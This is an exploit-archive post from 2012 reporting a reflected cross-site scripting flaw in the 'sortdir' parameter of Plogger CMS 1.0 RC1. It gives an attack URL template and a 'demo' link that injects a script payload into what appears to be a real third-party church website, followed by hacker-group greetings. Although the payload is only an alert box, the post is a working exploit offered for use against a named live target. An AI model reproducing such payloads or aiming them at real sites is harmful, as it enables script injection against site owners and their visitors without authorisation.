Home / exploits Plogger CMS 1.0 RC1 Cross Site Scripting
Posted on 31 August 2012
<!-- ________ .__ __________________ \_ ___ \_______|__| _____ \_____ \______ / /\_ __ |/ _(__ <| _/ \____| | / | Y Y / | \______ /|__| |__|__|_| /______ /____|_ / / / / / --> # Exploit Title: Plogger cms (sortdir) Cross Site Scripting Vulnerability # # Version : 1.0 RC1 # # Date: 08/29/2012 # # Author: Crim3R # # Site : Http://Ajaxtm.com/ # # Vendor Home or download link: http://www.plogger.org/download/ # # Tested on: all # ================================== Plogger is the next generation in open-source photo gallery systems [+] sortdir parametr in index.php is Vulnerable to xss [+] target/index.php?id=[id]&level=album&sortby=date_taken&sortdir=[htmlcode] D3m0: http://northwestbiblechapel.com/tnl/gallery/?id=5&level=album&sortby=date_taken&sortdir=%22%3E%3Cscript%3Ealert(0);%3C/script%3E ===============Crim3R@Att.Net========= [+] Greetz to All Ajaxtm Security Member Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal devilzc0der - Dominator - Hossein.R1369
